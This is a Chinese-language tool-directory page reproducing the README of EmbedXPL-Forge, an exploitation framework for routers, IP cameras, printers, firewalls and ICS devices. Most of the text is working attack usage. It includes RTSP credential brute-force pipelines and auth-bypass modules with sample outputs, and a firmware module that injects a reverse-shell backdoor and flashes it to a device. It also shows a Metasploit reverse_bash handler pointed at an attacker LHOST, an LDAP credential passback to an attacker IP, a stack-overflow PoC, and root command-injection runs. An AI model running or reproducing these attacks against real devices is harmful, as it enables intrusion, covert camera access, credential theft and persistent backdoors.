Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
EmbedXPL-Forge — 嵌入式设备安全评估框架 — 700 个模块、350 个 CVE、55 家厂商、APT 组织引擎。覆盖路由器、IP 摄像头、GPON ONT、ISP CPE、IoT/嵌入式边缘设备。 | Kitploit
工具/GitHubGitHub/mrhenrike/embedxpl-forge
嵌入式系统安全渗透测试框架漏洞扫描器漏洞利用框架物联网安全网络映射密码攻击Payload生成漏洞利用SCADA/ICS安全硬件与物联网安全固件分析
4282220小时18分前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHubmrhenrike/embedxpl-forge

EmbedXPL-Forge

嵌入式设备安全评估框架 — 700 个模块、350 个 CVE、55 家厂商、APT 组织引擎。覆盖路由器、IP 摄像头、GPON ONT、ISP CPE、IoT/嵌入式边缘设备。

查看仓库网站

EmbedXPL-Forge

Python Platform License XPL Suite Issues Last Commit


平台说明: 本框架主要在 Linux(Debian/Ubuntu/Kali)上设计和测试。大多数依赖硬件的模块(无线网卡、USB 设备、原始套接字访问、固件工具)需要 Linux。在 Windows 或 macOS 上运行可能导致许多模块出错或功能受限。强烈建议使用 Linux 以获得最大兼容性。


EmbedXPL-Forge

嵌入式与边界安全评估框架

EmbedXPL-Forge 是一个开源的漏洞利用与扫描框架,面向审计路由器、交换机、IP 摄像头、NVR/DVR、GPON ONT、ISP CPE、打印机、IoT、OT/ICS 以及嵌入式边缘设备的安全专业人员。它提供 2800+ 个活跃模块,涵盖凭据测试、漏洞利用、网络扫描、载荷生成、RTSP 摄像头攻击、固件操纵、多语言 PolyExploit 编排以及完整的打印机武器库——其中 700+ 个 CVE 映射到 114+ 个厂商,并配备 APT 组织攻击引擎,可复现真实世界的国家级攻击链。

版本: 3.2.0

功能特性

  • 625+ 个漏洞利用模块 — RCE、认证绕过、路径遍历、信息泄露、缓冲区溢出、DNS 劫持、命令注入、后门、CSRF、配置解密、WPA/WPS 密钥生成、出厂密码生成器、堆/栈 BOF 链
  • 88 个凭据模块 — 针对 FTP、SSH、Telnet、HTTP、SNMP、SFTP 的字典攻击
  • 185+ 个打印机漏洞利用模块 — HP、Canon、Lexmark、Xerox、Ricoh、Brother、Epson、Kyocera、Samsung;PJL/IPP/LPD/WSD/CUPS;Pwn2Own 2026 链;PrintingShellz;MS-RPRN NTLM 强制认证
  • 完整的 RTSP 摄像头引擎 — 路由暴力破解(195+ 条路由)、凭据暴力破解(80+ 组凭据)、Basic/Digest 认证、RTSPS/TLS、RTSP-over-HTTP 隧道(纯 Python,RFC 2326 App-C)、nmap/masscan/直连扫描器、ONVIF WS-Discovery、M3U 输出
  • 7 个自定义 Nmap NSE 脚本 — RTSP 发现、摄像头指纹识别、Hikvision/Dahua CVE 验证、默认凭据测试、多厂商 CVE 检查、快照捕获(pip install embedxpl[nse])
  • 固件利用套件 — 格式检测、后门注入、校验和修补、厂商刷机绕过(NETGEAR、TP-Link、D-Link、ASUS)
  • PolyExploit 编排器 — 运行时 C/C++ 编译(gcc/clang/mingw/cross)、执行 Ruby/Node.js/PHP/Bash/Perl 漏洞利用、msfconsole 集成、ExploitDB/searchsploit 集成
  • ICS/OT 模块 — Universal Robots PolyScope 5、RIOT OS、Modbus、S7comm、EtherNet/IP、BACnet、DNP3
  • 智能家居 / 海事 / 专用 — eNet SMART HOME、OpenRemote、Metis 海事 IoT(WIC/DFS)
  • 5+ 个扫描器模块 — AutoPwn、设备专用扫描器、WSD/mDNS 打印机发现
  • 32 个载荷模块 — 适用于 x86、x64、ARM、MIPS、Python、Perl、PHP 的反向/绑定 TCP shell
  • 13 个编码器模块 — 适用于 Python、PHP、Perl 的 Base64 和十六进制编码
  • 14 个通用模块 — Heartbleed、ShellShock、UPnP IGD、SNMP 暴力破解、TCP Xmas、UDP 放大、CVE 查询、DNS 劫持检测器、AITM 拦截器
  • 700+ 个 CVE 映射 — 从 2001 年到 2026 年,包括 2026 Pwn2Own 链以及关键 IoT/OT/海事 CVE
  • APT 组织攻击引擎 — 浏览并复现 APT28、Volt Typhoon、Sandworm、Quad7、Turla、APT40 的攻击链,并映射 MITRE ATT&CK
  • 23+ 个厂商专用字典 — 按厂商外部化的默认凭据(包括巴西 ISP 专用)
  • 网络发现 — SSDP、ARP、Nmap、Masscan、Scapy 回退、OUI 查询(IEEE 39k+ 条目)、T0–T5 时序配置
  • 会话管理 — 按主机(IP+MAC)持久化扫描历史、恢复/重启、完整发现索引
  • 链式自动入侵模块 — 多阶段厂商专用利用链(Huawei EG8145X6、CUPS Pwn2Own、Lexmark Pwn2Own 等)
  • 7 个自动化质量门禁 — tools/phase_gate.py 确保每个模块在合并前通过导入、反误报、引用和代码质量检查

支持的设备类型

支持的厂商

网络 / 路由器 / CPE: 2Wire · 3Com · ActionTec · Alcatel-Lucent · Alpha Networks · Arris · Aruba · Asmax · Astoria · ASUS · Belkin · BHU · Billion · Binatone · Calix · CERIO · Cisco · Cobham · Comtrend · D-Link · DD-WRT · Draytek · EasyBox (Arcadyan) · Edimax · EE BrightBox · EnGenius · FiberHome · Fortinet · Freebox · GL.iNet · GPON · HooToo · Huawei · Intelbras · IPFire · Juniper · LG · Linksys · Mercury · MiFi (Novatel) · MikroTik · MitraStar · Motorola · Movistar · Netcore · NETGEAR · Netsys · Observa Telecom · OpenWrt · RuggedCom · Ruijie · Seagate · SerComm · Shuttle · Sitecom · SMC · SonicWall · Starbridge · Technicolor · Tenda · Thomson · TOTOLINK · TP-Link · TRENDnet · Ubee · Ubiquiti · Unicorn · UTStarcom · Wavlink · Xiaomi · Zhone · Zoom · ZTE · ZyXEL

摄像头 / NVR / DVR: Hikvision · Dahua · Axis · Reolink · Amcrest · Uniview (UNV) · Tapo (TP-Link) · Swann · ANNKE · Edimax · Intelbras · Grandstream · Foscam · Acti · Avigilon · Beward · Brickcom · Cisco 摄像头 · Geuterbruck · Honeywell 摄像头 · Jovision · Siemens 摄像头 · Xiongmai (OEM) · Zivif · MVPower DVR · 通用 P2P WiFi 摄像头 · 通用 DVR/NVR OEM

打印机 / 多功能一体机: HP LaserJet/PageWide · Canon imageRUNNER/imageClass · Lexmark CX/CS/MS/MX · Xerox WorkCentre/AltaLink/VersaLink · Ricoh MP/Aficio/SP · Brother MFC/DCP · Epson WorkForce · Kyocera ECOSYS · Samsung SyncThru · 通用 IPP/PJL/LPD/CUPS/WSD

NAS / VPN / 防火墙 / 安全: QNAP · Synology · D-Link NAS · Zyxel NAS · Ivanti · SonicWall · Fortinet (FortiOS/FortiGate/FortiWeb/FortiClient EMS) · Palo Alto (PAN-OS) · Cisco ASA/FTD · CheckPoint · Sophos XG · WatchGuard Firebox · Avocent

ICS / OT / 机器人: Universal Robots (UR3/UR5/UR10/UR16) · OpenPLC · Modbus TCP · Siemens S7 · EtherNet/IP CIP · BACnet · DNP3 · PROFINET DCP

智能家居 / 海事 / 嵌入式操作系统: eNet SMART HOME · OpenRemote IoT · Metis WIC/DFS(海事) · RIOT OS · OpenWrt · VxWorks · QNX · Zephyr · wolfSSL · Tuya arduino-tuyaopen

安装

选项 1 — PyPI(推荐)```bash

pip install embedxpl embedxpl

root@kitploit:~
### 选项 2 — 使用 Nmap NSE 脚本```bash
# Install EmbedXPL + NSE dependencies
pip install "embedxpl[nse]"

# Install the 7 custom NSE scripts into Nmap's scripts directory
python -m embedxpl.nse install
# or using the entry point:
embedxpl-nse install

# Verify installation
python -m embedxpl.nse list

注意: 在 Linux/macOS 上,安装步骤可能需要 sudo 权限才能写入 /usr/share/nmap/scripts/。 运行:sudo python -m embedxpl.nse install

选项 3 — 从源码安装```bash

git clone https://github.com/mrhenrike/EmbedXPL-Forge.git cd EmbedXPL-Forge chmod +x setup_venv.sh run.sh ./setup_venv.sh # creates .venv (PEP 668 safe) ./run.sh # recommended launcher

or: python exf.py # auto-detects .venv

Optional: also install NSE scripts

.venv/bin/python -m embedxpl.nse install

root@kitploit:~
### 选项 4 — Python 模块```bash
pip install embedxpl
python -m embedxpl

快速开始```bash

Install

pip install embedxpl

Launch interactive shell

embedxpl

Run a specific module directly

embedxpl -m exploits/routers/tplink/wr841n_credential_disclosure_cve_2023_50224 -s target 192.168.1.1

Network discovery

embedxpl -c "discover 192.168.1.0/24"

RTSP camera scan + brute-force

embedxpl -m exploits/cameras/multi/rtsp_cameradar_attack -s target 192.168.1.100

Nmap NSE quick scan (after pip install embedxpl[nse] + embedxpl-nse install)

nmap -p 554,5554,8554 --script embedxpl-rtsp-discover 192.168.1.0/24 nmap -p 80,443 --script 'embedxpl-*' 192.168.1.100

root@kitploit:~
## 用法

### 交互式 Shell```
exf > use exploits/routers/dlink/dir_300_600_rce
exf (D-Link DIR-300 & DIR-600 RCE) > show options
exf (D-Link DIR-300 & DIR-600 RCE) > set target 192.168.1.1
exf (D-Link DIR-300 & DIR-600 RCE) > check
exf (D-Link DIR-300 & DIR-600 RCE) > run

常用命令

APT 组织攻击引擎```

List all cataloged threat actors

exf > apt list

Show APT28 attack chain details

exf > apt show apt28

Search for groups targeting MikroTik

exf > apt search mikrotik

Execute the full APT28 DNS hijack chain (interactive)

exf > apt run apt28

Execute only the credential disclosure attack (#0)

exf > apt run apt28 0

root@kitploit:~
### 网络发现```
# Auto-detect subnet from active interfaces and scan (default timing T3)
exf > discover

# Scan specific subnet with stealth timing
exf > discover 192.168.1.0/24 --timing T1

# Force fresh scan, ignore previous session history
exf > discover 192.168.1.0/24 --fresh

发现过程采用多阶段流水线:ARP 扫描 → Nmap(多方法主机探测)→ Scapy → TCP 连接回退。结果会与模块目录进行匹配,并按厂商/型号过滤。IEEE OUI 数据库(embedxpl/data/oui.txt)通过在线优先查询和本地回退将 MAC 地址解析为厂商。当主机暴露 WiFi 能力时,该工具会推荐使用 WirelessXPL-Forge 进行无线特定攻击。

时序配置(T0–T5) 与 Nmap 惯例一致:

会话管理```

List all hosts with scan history

exf > sessions list

Full history for one host: tested modules, findings, timestamps

exf > sessions show 192.168.1.1

Export session as JSON

exf > sessions export 192.168.1.1

Delete one session

exf > sessions delete 192.168.1.1

Purge all sessions

exf > sessions purge

root@kitploit:~
会话以 JSON 格式存储在 `~/.exf_sessions/` 中,以 IP+MAC 的 SHA-256 作为键。当重新发现已知主机时,已测试的模块会显示为 `[Tested]`,并默认跳过。

### AutoPwn Scanner```
exf > use scanners/autopwn
exf (AutoPwn) > set target 192.168.1.0/24
exf (AutoPwn) > run

RTSP 摄像头引擎

功能完备的 RTSP 攻击流水线,采用 Python 原生实现,覆盖所有标准 RTSP 传输模式。

传输模式

攻击流水线```python

from embedxpl.core.rtsp.scanner import RTSPScanner from embedxpl.core.rtsp.attacker import RTSPAttacker from embedxpl.core.rtsp.models import RTSPStream

1. Discover RTSP-speaking hosts on the network

scanner = RTSPScanner(timeout=5.0) hosts = scanner.scan_network("192.168.1.0/24", ports=[554, 5554, 8554])

Returns: [('192.168.1.100', 554), ('192.168.1.101', 8554), ...]

2. Run full 5-phase attack pipeline

attacker = RTSPAttacker(timeout=5.0) results = attacker.attack_all(hosts)

3. Inspect results

for stream in results: print(stream.url) # rtsp://admin:@192.168.1.100:554/h264/ch1/main/av_stream print(stream.username) # admin print(stream.password) # (empty string) print(stream.route) # h264/ch1/main/av_stream print(stream.auth_type) # AuthType.BASIC print(stream.accessible) # True

root@kitploit:~
**预期输出:**```
[RTSP] Scanning 192.168.1.0/24 on ports [554, 5554, 8554]...
[RTSP] Found 3 RTSP hosts
[RTSP] 192.168.1.100:554 — Phase 1: Route discovery (195 routes)...
[RTSP] 192.168.1.100:554 — Route found: h264/ch1/main/av_stream
[RTSP] 192.168.1.100:554 — Phase 2: Auth detection → Basic (realm="IP Camera")
[RTSP] 192.168.1.100:554 — Phase 3: Credential brute-force (80 pairs)...
[RTSP] 192.168.1.100:554 — ✓ Credentials: admin:
[RTSP] 192.168.1.100:554 — Phase 4: Stream validated (200 OK)
[RTSP] Attack complete. Accessible streams: 2/3

跳过扫描模式(已知主机)```python

Skip network scan, attack known hosts directly

hosts = scanner.skip_scan(["192.168.1.100:554", "192.168.1.101"])

Accepts: "host:port", "host", CIDR "192.168.1-2.0-255", hostnames

root@kitploit:~
**预期输入/输出:**```python
# Input
hosts = scanner.skip_scan(["camera.local:554", "192.168.1-2.100-110"])

# Output: [(resolved_ip, port), ...]
# [('192.168.1.100', 554), ('192.168.1.200', 554), ('192.168.1.100', 554), ...]

RTSP-over-HTTP 隧道

用于摄像头位于阻止 TCP/554 的 HTTP 代理或企业防火墙之后的情况。```python from embedxpl.core.rtsp.client import RTSPClient, RTSPOverHTTPTunnel

Direct tunnel usage

tunnel = RTSPOverHTTPTunnel(host="10.0.0.50", port=8080, timeout=10.0) response = tunnel.send_rtsp_via_http( "OPTIONS rtsp://10.0.0.50:8080/ RTSP/1.0\r\nCSeq: 1\r\n\r\n" )

Returns: raw RTSP response bytes (base64-decoded from HTTP body)

Or via RTSPClient factory

client = RTSPClient.from_scheme("10.0.0.50", 8080, "http", timeout=10.0) status, server, methods = client.options() # → (200, "Hikvision NVRA", "OPTIONS, DESCRIBE, SETUP, PLAY")

root@kitploit:~
**预期输入/输出:**```
Input : host=10.0.0.50, port=8080, scheme="http"
Output:
  status  = 200
  server  = "Hikvision IP Camera NVRA (V5.4.5)"
  methods = "OPTIONS, DESCRIBE, SETUP, PLAY, TEARDOWN"

RTSP 模块(交互式)```

embedxpl > use exploits/cameras/multi/rtsp_cameradar_attack embedxpl (RTSP Cameradar Attack) > show options

Option Default Description


target required Target IP/CIDR/range (e.g. 192.168.1.0/24) ports 554,5554,8554 RTSP ports to scan timeout 5 Connection timeout (seconds) scheme rtsp Transport: rtsp | rtsps | http | https skip_scan false Skip nmap discovery, attack directly output_m3u false Save accessible streams to streams.m3u onvif_discover false Enable ONVIF WS-Discovery

embedxpl (RTSP Cameradar Attack) > set target 192.168.1.0/24 embedxpl (RTSP Cameradar Attack) > set output_m3u true embedxpl (RTSP Cameradar Attack) > run

root@kitploit:~
## Nmap NSE 脚本

EmbedXPL-Forge 包含 7 个自定义 Nmap NSE 脚本,用于 IoT/摄像头扫描和 CVE 检测。

### 安装```bash
# Install with NSE extras
pip install "embedxpl[nse]"

# Install scripts to Nmap (Linux/macOS may need sudo)
python -m embedxpl.nse install
# or
embedxpl-nse install

# Force overwrite existing scripts
python -m embedxpl.nse install --force

# Custom Nmap directory
python -m embedxpl.nse install --nse-dir /opt/homebrew/share/nmap/scripts

预期输出:``` [OK] embedxpl-rtsp-discover.nse → /usr/share/nmap/scripts/embedxpl-rtsp-discover.nse [OK] embedxpl-camera-identify.nse → /usr/share/nmap/scripts/embedxpl-camera-identify.nse [OK] embedxpl-hikvision-vuln.nse → /usr/share/nmap/scripts/embedxpl-hikvision-vuln.nse [OK] embedxpl-dahua-vuln.nse → /usr/share/nmap/scripts/embedxpl-dahua-vuln.nse [OK] embedxpl-rtsp-creds.nse → /usr/share/nmap/scripts/embedxpl-rtsp-creds.nse [OK] embedxpl-iot-cve-check.nse → /usr/share/nmap/scripts/embedxpl-iot-cve-check.nse [OK] embedxpl-camera-snapshot.nse → /usr/share/nmap/scripts/embedxpl-camera-snapshot.nse

Installed: 7 script(s) [OK] nmap --script-updatedb complete

root@kitploit:~
### 列表 / 信息```bash
python -m embedxpl.nse list
python -m embedxpl.nse info rtsp-discover

NSE 脚本参考

embedxpl-rtsp-discover — RTSP 服务发现

检测 RTSP 服务,抓取 Server: 横幅,识别厂商,列出支持的方法,并交叉引用已知 CVE。```bash

Basic usage

nmap -p 554,5554,8554 --script embedxpl-rtsp-discover 192.168.1.0/24

With custom timeout

nmap -p 554,5554,8554 --script embedxpl-rtsp-discover --script-args rtsp.timeout=3 192.168.1.0/24

root@kitploit:~
**预期输出:**```
554/tcp open rtsp
| embedxpl-rtsp-discover:
|   Status : 200
|   Server : Hikvision IP Camera NVRA (V5.4.5)
|   Methods: OPTIONS, DESCRIBE, SETUP, PLAY, TEARDOWN
|   Vendor : Hikvision
|   Known CVEs: CVE-2021-36260 (RCE, CVSS 9.8), CVE-2017-7921 (Auth Bypass)
|   EmbedXPL module: exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
|   Exploit hint: embedxpl > use exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
|_  Full attack: embedxpl > use exploits/cameras/multi/rtsp_cameradar_attack

embedxpl-camera-identify — 深度摄像头指纹识别

多协议识别:探测 HTTP/HTTPS Web 界面、RTSP 横幅和 ONVIF。提取厂商、型号、固件、序列号和 MAC 地址。```bash nmap -p 80,443,554,37777 --script embedxpl-camera-identify 192.168.1.100 nmap -sV -p- --script embedxpl-camera-identify 192.168.1.0/24

root@kitploit:~
**预期输出(Hikvision):**```
80/tcp open http
| embedxpl-camera-identify:
|   Protocol : HTTP (HTTP 200)
|   Vendor   : Hikvision
|   Model    : DS-2CD2143G0-I
|   Firmware : V5.6.2 build 190401
|   Serial   : DS-2CD2143G0-I20190401AAWRA123456789
|   CVEs     : CVE-2021-36260 (RCE, CVSS 9.8) | CVE-2017-7921 (Auth Bypass)
|   Vuln assessment: LIKELY VULNERABLE (endpoint accessible without auth)
|   EmbedXPL module: exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
|_  Run exploit: embedxpl > use exploits/cameras/hikvision/rtsp_rce_cve_2021_36260

embedxpl-hikvision-vuln — Hikvision CVE 检查器

主动验证 CVE-2021-36260(通过 /SDK/webLanguage 的 RCE,CVSS 9.8)和 CVE-2017-7921(认证绕过快照)。```bash nmap -p 80,443,8080 --script embedxpl-hikvision-vuln 192.168.1.100 nmap -p 80,443,8080 --script embedxpl-hikvision-vuln --script-args timeout=10 192.168.1.0/24

root@kitploit:~
**预期输出:**```
80/tcp open http
| embedxpl-hikvision-vuln:
|   Device          : DS-2CD2143G0-I
|   Firmware        : V5.3.0 build 170112
|   CVE-2021-36260  : VULNERABLE — endpoint accepts PUT without authentication (CVE-2021-36260, CVSS 9.8)
|   CVE-2017-7921   : VULNERABLE — snapshot captured without valid credentials (CVE-2017-7921)
|   EmbedXPL RCE module  : exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
|   EmbedXPL Auth Bypass : exploits/cameras/hikvision/info_disclosure_cve_2017_7921
|_  Run full exploit: embedxpl > use exploits/cameras/hikvision/rtsp_rce_cve_2021_36260

embedxpl-dahua-vuln — 大华 CVE 检测器

测试 CVE-2021-33044(认证绕过,CVSS 9.8)、CVE-2020-25078(用户信息泄露)、CVE-2013-6117(旧版 DVR)。同时覆盖大华 OEM 厂商:Amcrest、Intelbras、TVT、Jovision、ANNKE。```bash nmap -p 80,37777 --script embedxpl-dahua-vuln 192.168.1.0/24

root@kitploit:~
**预期输出:**```
80/tcp open http
| embedxpl-dahua-vuln:
|   Vendor         : Dahua (or Dahua-OEM: Amcrest / Intelbras / TVT)
|   CVE-2021-33044 : VULNERABLE — snapshot captured via Digest bypass (CVE-2021-33044, CVSS 9.8)
|   CVE-2020-25078 : VULNERABLE — Users disclosed: [admin, operator]
|   CVE-2013-6117  : NOT VULNERABLE
|   EmbedXPL Auth Bypass  : exploits/cameras/dahua/cctv_auth_bypass_cve_2021_33044
|   EmbedXPL Cred Extract : exploits/cameras/dahua/cctv_37777_credential_extraction
|_  Run exploit: embedxpl > use exploits/cameras/dahua/cctv_auth_bypass_cve_2021_33044

embedxpl-rtsp-creds — RTSP 默认凭据测试器

使用 Basic 认证在 9+ 个常见 RTSP 路由上测试 18 组默认凭据。报告第一个匹配项。```bash nmap -p 554,5554,8554 --script embedxpl-rtsp-creds 192.168.1.100

With custom route hint

nmap -p 554 --script embedxpl-rtsp-creds --script-args rtsp.route=live.sdp 192.168.1.100

root@kitploit:~
**预期输出:**```
554/tcp open rtsp
| embedxpl-rtsp-creds:
|   Server           : Hikvision IP Camera NVRA
|   Credential found : admin: (empty password)
|   Stream URL       : rtsp://admin:@192.168.1.100:554/h264/ch1/main/av_stream
|   Auth type        : Basic
|   Response code    : 200
|   EmbedXPL full scan : exploits/cameras/multi/rtsp_cameradar_attack
|_  Run exploit: embedxpl > use exploits/cameras/multi/rtsp_cameradar_attack

embedxpl-iot-cve-check — 多厂商 CVE 指纹识别

检测并验证 Hikvision、Dahua、D-Link NAS、Reolink、Uniview、QNAP、SonicWall 和 GPON 中的 10 个活跃 CVE。```bash nmap -p 80,443,8080 --script embedxpl-iot-cve-check 192.168.1.0/24

root@kitploit:~
**预期输出:**```
80/tcp open http
| embedxpl-iot-cve-check:
|   CVE-2021-36260 (Hikvision, CVSS 9.8): POSSIBLY VULNERABLE — HTTP 200 returned
|     → EmbedXPL: CVE-2021-36260 : use exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
|   CVE-2021-33044 (Dahua, CVSS 9.8)   : NOT VULNERABLE — HTTP 404
|   EmbedXPL-Forge: https://github.com/mrhenrike/EmbedXPL-Forge
|_  Full exploitation: pip install embedxpl && embedxpl

embedxpl-camera-snapshot — 未认证快照访问

探测 16 个厂商特定的快照端点。报告任何无需凭据即可返回 image/* 的 URL。可选地将 JPEG 文件保存到本地。```bash nmap -p 80,443,8080 --script embedxpl-camera-snapshot 192.168.1.100

Save snapshots to disk

nmap -p 80 --script embedxpl-camera-snapshot --script-args outdir=/tmp/snaps 192.168.1.0/24

root@kitploit:~
**预期输出:**```
80/tcp open http
| embedxpl-camera-snapshot:
|   Endpoint 1 (Dahua):
|     URL          : http://192.168.1.100:80/cgi-bin/snapshot.cgi?channel=1
|     Content-Type : image/jpeg
|     Size         : 45231 bytes
|     Access       : UNAUTHENTICATED SNAPSHOT ACCESS
|     EmbedXPL module: exploits/cameras/dahua/cctv_auth_bypass_cve_2021_33044
|_    Run exploit: embedxpl > use exploits/cameras/dahua/cctv_auth_bypass_cve_2021_33044

通过 Python 运行所有 NSE 脚本```bash

Run all scripts via embedxpl-nse CLI

python -m embedxpl.nse run --target 192.168.1.0/24 --scripts all

Run specific scripts

python -m embedxpl.nse run --target 192.168.1.100 --scripts rtsp-discover,hikvision-vuln

With output file

python -m embedxpl.nse run --target 192.168.1.0/24 --scripts all --output /tmp/scan.txt

Custom ports

python -m embedxpl.nse run --target 192.168.1.0/24 --scripts all --ports 80,443,554,5554,8080,8554

root@kitploit:~
**卸载:**```bash
python -m embedxpl.nse uninstall

固件利用```

embedxpl > use exploits/firmware/netgear_firmware_flash embedxpl (NETGEAR Firmware Flash) > set target 192.168.1.1 embedxpl (NETGEAR Firmware Flash) > set firmware /path/to/backdoored.bin embedxpl (NETGEAR Firmware Flash) > set lhost 10.0.0.10 embedxpl (NETGEAR Firmware Flash) > set lport 4444 embedxpl (NETGEAR Firmware Flash) > run

root@kitploit:~
**功能说明:**
1. 检测固件格式(TRX、DLOB、SEAMA、WRGG、原始二进制)
2. 在合适的偏移处注入反向 shell 后门
3. 重新计算 CRC32/MD5 校验和
4. 通过厂商特定的刷写端点上传(在适用的情况下绕过认证)
5. 等待设备重启并验证后门执行


## PolyExploit 编排器

为无法移植到纯 Python 的漏洞利用提供运行时 C/C++ 编译和多语言脚本执行能力。

### C/C++ 运行时编译```python
from embedxpl.core.poly import CCompiler

compiler = CCompiler()

# Check available compilers
print(compiler.compiler_available())  # {'gcc': True, 'clang': False, 'mingw': False}

# Compile a C PoC exploit at runtime
binary = compiler.compile_c(
    source="""
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[]) {
    // Stack overflow PoC
    char buf[64];
    memcpy(buf, argv[1], atoi(argv[2]));
    return 0;
}
""",
    arch="x86",   # x86, x64, arm, mips, mingw
)
# Returns: Path to compiled binary (cached by source hash)

# Execute with arguments
output = compiler.run_binary(binary, args=["AAAA"*100, "400"])
print(output.stdout)

多语言脚本执行```python

from embedxpl.core.poly import PolyRunner

runner = PolyRunner() print(runner.available_runtimes())

{'ruby': True, 'node': True, 'php': True, 'bash': True, 'perl': True}

Execute a Ruby exploit

result = runner.run_ruby(""" require 'net/http' resp = Net::HTTP.get_response(URI('http://192.168.1.1/cgi-bin/exploit')) puts resp.body """, args=["192.168.1.1"])

Metasploit integration

runner.run_metasploit(module="exploit/multi/handler", options={ "PAYLOAD": "cmd/unix/reverse_bash", "LHOST": "10.0.0.10", "LPORT": "4444", })

ExploitDB / searchsploit lookup

results = runner.searchsploit("hikvision rtsp") for r in results: print(r["Title"], r["Path"])

root@kitploit:~
## v3.1.0 新增内容 — CVE 2026/2025/2024 + 打印机域 + 质量门禁

**54 个新模块**,涵盖打印机、嵌入式操作系统、ICS/OT、智能家居、海事物联网以及 2026 Pwn2Own 攻击链。重点亮点:

### 2026 Pwn2Own 攻击链```
# CUPS Pwn2Own 2026 — Full 4-stage chain (CVE-2026-34477/78/79/80, CVSS 9.9)
exf > use exploits/printers/linux/cups_pwn2own_chain_cve_2026_34480
exf (CUPS Pwn2Own Chain) > set target 192.168.1.10
exf (CUPS Pwn2Own Chain) > set delay 2
exf (CUPS Pwn2Own Chain) > run
[*] [Stage 1/4] Triggering UAF in cups-browsed (CVE-2026-34477)
[*] [Stage 2/4] Heap spray via IPP job attributes (CVE-2026-34478)
[*] [Stage 3/4] ROP chain LPE delivery (CVE-2026-34479)
[*] [Stage 4/4] Chain complete - verifying
[+] CUPS process no longer responding - chain executed

# Lexmark Pwn2Own 2026 — 3-stage chain
exf > use exploits/printers/lexmark/lexmark_pwn2own_2026_chain
exf (Lexmark Pwn2Own) > set target 192.168.1.20
exf (Lexmark Pwn2Own) > run

2026 年关键 CVE```

wolfSSL identity forgery (CVE-2026-5194, CVSS 9.3, ~5B devices)

exf > use exploits/embedded_os/wolfssl_identity_forgery_cve_2026_5194 exf (wolfSSL Identity Forgery) > set target 192.168.1.1 exf (wolfSSL Identity Forgery) > set port 443 exf (wolfSSL Identity Forgery) > run

PAN-OS User-ID BOF (CVE-2026-0300, CVSS 9.8, active exploitation)

exf > use exploits/firewalls/paloalto/panos_userid_bof_rce_cve_2026_0300 exf (PAN-OS User-ID BOF) > set target 10.0.0.1 exf (PAN-OS User-ID BOF) > set port 443 exf (PAN-OS User-ID BOF) > run

Universal Robots PolyScope 5 (CVE-2026-8153, CVSS 9.8, unauth OS cmd injection)

exf > use exploits/ics/ur_polyscope5_dashboard_cmd_injection_cve_2026_8153 exf (UR PolyScope5 Injection) > set target 192.168.1.50 exf (UR PolyScope5 Injection) > set cmd "id" exf (UR PolyScope5 Injection) > run [] Connecting to PolyScope Dashboard on 192.168.1.50:29999 [+] PolyScope Dashboard Server detected [] Attempting OS command injection (CVE-2026-8153) [+] Command injection confirmed! [+] Output: uid=0(root) gid=0(root)

GNU InetUtils telnetd auth bypass (CVE-2026-24061, CVSS 9.8, unauth root)

exf > use exploits/embedded_os/gnu_inetutils_telnetd_auth_bypass_cve_2026_24061 exf (InetUtils telnetd Bypass) > set target 192.168.1.1 exf (InetUtils telnetd Bypass) > set cmd "id" exf (InetUtils telnetd Bypass) > run [*] Sending CVE-2026-24061 bypass payload [+] Authentication bypass succeeded! Shell prompt detected [+] Command output: uid=0(root)

Metis maritime IoT (CVE-2026-2248, CVSS 9.8, unauth root shell)

exf > use exploits/specialized/metis_wic_unauth_rce_cve_2026_2248 exf (Metis WIC RCE) > set target 10.1.2.3 exf (Metis WIC RCE) > run

Cisco IOS XE WLC hardcoded JWT (CVE-2025-20188, CVSS 10.0)

exf > use exploits/routers/cisco/ios_xe_wlc_jwt_rce_cve_2025_20188 exf (Cisco WLC JWT RCE) > set target 10.0.0.1 exf (Cisco WLC JWT RCE) > set port 443 exf (Cisco WLC JWT RCE) > run

root@kitploit:~
### Printer Arsenal 示例```
# HP PJL full scan (native — no external tools)
exf > use exploits/printers/hp/hp_laserjet_pjl_scan_native
exf (HP PJL Scanner) > set target 192.168.1.100
exf (HP PJL Scanner) > run
[+] PJL interface reachable
[+] INFO ID: HP LASERJET PRO M402N
INFO STATUS     : READY
INFO PAGECOUNT  : 12847
INFO MEMORY     : 512000 BYTES

# Ricoh HTTP buffer overflow (CVE-2024-34161, CVSS 9.8)
exf > use exploits/printers/ricoh/ricoh_http_bof_cve_2024_34161
exf (Ricoh HTTP BOF) > set target 192.168.1.101
exf (Ricoh HTTP BOF) > run

# Brother LDAP credential passback
exf > use exploits/printers/brother/brother_ldap_smb_passback
exf (Brother LDAP Passback) > set target 192.168.1.102
exf (Brother LDAP Passback) > set attacker_ip 192.168.1.10
exf (Brother LDAP Passback) > run
[+] LDAP server redirected — wait for printer authentication

后门 / 出厂密码覆盖

27+ 个漏洞利用模块,针对出厂密码、硬编码后门、默认 WPA 密钥生成算法以及跨旧版和现代 SOHO 路由器的 DNS 劫持 CSRF 向量。关键示例:```

EasyBox (Arcadyan) — WPA2 default key from MAC (factory algorithm)

exf > use exploits/routers/easybox/easybox_wpa_keygen exf (EasyBox WPA Keygen) > set target 192.168.1.1 exf (EasyBox WPA Keygen) > run [*] No MAC supplied — attempting to extract from web UI... [+] MAC found: AA:BB:CC:DD:EE:FF [+] Device MAC : AA:BB:CC:DD:EE:FF [+] WPA2 PSK : 3f2d9a1b

Seagate NAS — Ghost PHP unauthenticated RCE (CVE-2014-8684)

